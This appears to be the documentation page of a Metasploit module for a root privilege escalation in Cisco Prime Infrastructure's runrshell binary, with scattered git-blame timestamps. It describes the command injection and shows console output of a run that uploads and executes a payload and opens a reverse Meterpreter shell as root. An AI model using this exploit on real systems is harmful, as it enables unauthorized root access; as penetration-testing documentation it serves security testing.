2020-01-20 21:26:59 -05:00
|
|
|
## Vulnerable Application
|
2019-06-10 10:29:43 -05:00
|
|
|
|
2020-01-20 21:26:59 -05:00
|
|
|
This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute
|
|
|
|
|
a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root.
|
|
|
|
|
It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
|
2019-06-10 10:29:43 -05:00
|
|
|
|
2020-01-20 21:26:59 -05:00
|
|
|
## Scenarios
|
2019-06-10 10:29:43 -05:00
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
|
|
|
|
|
|
2019-06-10 11:20:25 -05:00
|
|
|
[*] Started reverse TCP handler on 192.168.0.21:4444
|
|
|
|
|
[*] Uploading /tmp/mYVrqmsETa.bin
|
2019-06-10 10:29:43 -05:00
|
|
|
[*] chmod the file with +x
|
2019-06-10 11:20:25 -05:00
|
|
|
[*] Executing /tmp/mYVrqmsETa.bin
|
2019-06-10 10:29:43 -05:00
|
|
|
[*] Sending stage (985320 bytes) to 192.168.0.23
|
2019-06-10 11:20:25 -05:00
|
|
|
[*] Meterpreter session 4 opened (192.168.0.21:4444 -> 192.168.0.23:55554) at 2019-06-10 11:18:13 -0500
|
|
|
|
|
[+] Deleted /tmp/mYVrqmsETa.bin
|
2019-06-10 10:29:43 -05:00
|
|
|
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: uid=0, gid=0, euid=0, egid=0
|
2019-06-10 11:20:25 -05:00
|
|
|
meterpreter >
|
2019-06-10 10:29:43 -05:00
|
|
|
```
|
